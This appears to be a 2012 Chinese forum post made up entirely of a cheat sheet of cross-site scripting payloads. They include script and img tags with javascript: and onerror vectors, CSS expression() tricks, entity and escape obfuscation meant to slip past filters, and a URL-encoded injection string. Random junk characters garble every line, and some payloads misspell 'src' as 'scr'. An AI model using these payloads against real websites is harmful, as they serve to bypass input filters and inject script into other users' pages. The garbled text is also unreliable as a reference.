<script>alert("跨站")</script> (最常用)
, u7 l7 u9 T1 R" u# ^9 v2 Y<img scr=javascript:alert("跨站")></img>
+ ^% Z+ }. ]: Q! M7 U2 b5 P<img scr="javascript: alert(/跨站/)></img>3 D! I' L1 c" u3 Y% d7 y2 W
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)9 t% Q$ ^# L) Z6 Z! ~% @
<img scr="#" onerror=alert(/跨站/)></img>2 P7 Z+ a/ A0 q" W2 W4 O
<img scr="#" style="xss:expression(alert(/xss/));"></img>
/ z# S- A1 j. h5 k& b5 Y<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
( w. T6 z. ~ K9 s, K7 n* q* S- h( ?<img src=vbscript:msgbox ("xss")></img>
/ M+ _8 m7 G9 [<style> input {left:expression (alert('xss'))}</style>
( i( J( P% k7 E, H<div style={left:expression (alert('xss'))}></div>' k$ o7 s) Z: U6 Q7 i5 E6 L
<div style={left:exp/* */ression (alert('xss'))}></div>1 Q- x' y+ x+ d9 h+ p2 |
<div style={left:\0065\0078ression (alert('xss'))}></div>
6 b& g* }% t0 x- }html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>( [. m) L$ h7 W4 a5 t" B ?
unicode <div style="{left:expRessioN (alert('xss'))}">/ x8 M: x6 R7 V% |5 x
t) V+ w0 p6 i
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>[", ]5 z Z. ?8 X+ h6 }: Z" A1 j! J$ M8 r
|
发表于 2012-9-15 14:09:13
收藏
支持
反对